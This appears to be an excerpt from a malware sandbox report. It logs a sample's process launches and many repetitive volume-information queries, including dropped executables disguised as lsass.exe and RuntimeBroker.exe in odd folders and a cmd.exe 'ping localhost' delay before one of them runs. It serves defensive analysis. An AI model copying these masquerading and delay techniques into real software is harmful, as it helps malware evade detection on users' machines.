                    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
                    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                    Source: C:\Windows\System32\cmd.exe | Process created: C:\Recovery\USZqVcJFLA.exe "C:\Recovery\USZqVcJFLA.exe"
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | Queries volume information: C:\Users\user\Desktop\JNKHlxGvw4.exe VolumeInformation
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Users\user\Favorites\lsass.exe | Queries volume information: C:\Users\user\Favorites\lsass.exe VolumeInformation
                    Source: C:\Users\user\Favorites\lsass.exe | Queries volume information: C:\Users\user\Favorites\lsass.exe VolumeInformation
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exe | Queries volume information: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exe VolumeInformation
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exe | Queries volume information: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exe VolumeInformation
                    Source: C:\Recovery\USZqVcJFLA.exe | Queries volume information: C:\Recovery\USZqVcJFLA.exe VolumeInformation
                    Source: C:\Recovery\USZqVcJFLA.exe | Queries volume information: C:\Recovery\USZqVcJFLA.exe VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
